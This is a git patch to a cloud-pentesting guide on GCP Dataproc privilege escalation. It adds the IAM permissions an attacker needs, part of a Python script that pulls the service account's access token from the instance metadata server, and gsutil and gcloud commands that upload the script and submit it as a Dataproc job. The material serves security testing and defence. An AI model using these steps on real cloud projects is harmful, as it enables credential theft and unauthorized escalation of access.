From dbac949488e9011b8f1ab08bd3f4ab7bd7dee67f Mon Sep 17 00:00:00 2001
From: Mac
Date: Sun, 26 Jan 2025 21:53:14 +0400
Subject: [PATCH] dataproc privesc update
---
 .../gcp-dataproc-privesc.md | 13 +++++++++++--
 1 file changed, 11 insertions(+), 2 deletions(-)
diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataproc-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataproc-privesc.md
index 8dee9c50c..fa004ef8c 100644
--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataproc-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataproc-privesc.md
@@ -12,10 +12,16 @@ roles/dataproc.admin - Full control over Dataproc clusters, including creating,
 These permissions make both roles highly sensitive and dangerous if misused.
+## dataproc.jobs.create & dataproc.clusters.use
+
+The following method - projects.regions.jobs.submit enables a SA to create a dataproc job, which can be abused as shown in the example below. it must be noted that in order to exploit these permissions SA should also have the necessary privileges to move the malicious script to the storage bucket (storage.objects.create).
+
+the following permissions were assigned to the SA for the PoC (dataproc.clusters.get, dataproc.clusters.use, dataproc.jobs.create, dataproc.jobs.get, dataproc.jobs.list, storage.objects.create, storage.objects.get, storage.objects.list)
+
+## Privilege Escalation via Metadata Token Leaking
-By abusing the permissions granted by roles/dataproc.editor or roles/dataproc.admin, an attacker can:
+
 - Submit a job to a Dataproc cluster.
@@ -29,7 +35,7 @@ The following script demonstrates how an attacker can submit a job to a Dataproc
 import requests
-# Metadata server URL to fetch the access token
+## Metadata server URL to fetch the access token
 ```
 metadata_url = "http://metadata/computeMetadata/v1/instance/service-accounts/default/token"
@@ -53,6 +59,9 @@ if __name__ == "__main__":
 ### Steps to exploit
 ```
+# Copy the script to the storage bucket
+gsutil cp fetch-metadata-token.py gs://dataproc-poc-bucket-hacktest/fetch-metadata-token.py
+# Submit the malicious job
 gcloud dataproc jobs submit pyspark gs:///fetch_metadata_token.py \
 --cluster= \
 --region=